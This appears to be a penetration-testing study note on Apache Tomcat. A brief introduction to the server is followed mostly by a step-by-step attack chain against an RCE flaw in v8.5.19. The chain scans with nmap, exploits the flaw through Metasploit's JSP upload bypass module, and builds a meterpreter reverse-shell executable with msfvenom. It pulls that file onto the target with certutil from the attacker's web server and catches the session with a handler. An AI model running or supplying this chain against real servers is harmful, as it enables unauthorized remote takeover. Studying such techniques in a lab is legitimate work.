Apache Tomcat Web Server

Apache Tomcat, or simply Tomcat Server, is a widely used free and open-source web server for running Java-based websites and applications. It allows developers to host and manage dynamic web applications built on the Java platform.

Tomcat uses the HTTP protocol to handle communication between the server and users. By default, it runs on TCP Port 8080.

The Apache HTTP Server is commonly used to host static and dynamic websites, especially those built with PHP. On the other hand, Apache Tomcat is mainly used for Java-based web applications.

Apache Tomcat v8.5.19 has a remote code execution (RCE) vulnerability that allows attackers to upload and run a malicious JSP payload, giving them remote access to the target server. Metasploit (MSF) has a ready-made exploit module that can be used to take advantage of this weakness and gain control over the system.

nmap -sS -sV -O [IP]

msfconsole -q
setg RHOSTS [IP]
search type:exploit tomcat_jsp
use exploit/multi/http/tomcat_jsp_upload_bypass

show options
set payload java/jsp_shell_bind_tcp
set SHELL cmd
exploit

sessions
# search shell_to_meterpreter

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[ATTACK IP] LPORT=[PORT] -f exe > meterpreter.exe

sudo python -m SimpleHTTPServer 80

sessions 1
certutil -urlcache -f [ATTACKIP]/meterpreter.exe meterpreter.exe

use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [ATTACK IP]
set LPORT [PORT]
run

.\meterpreter.exe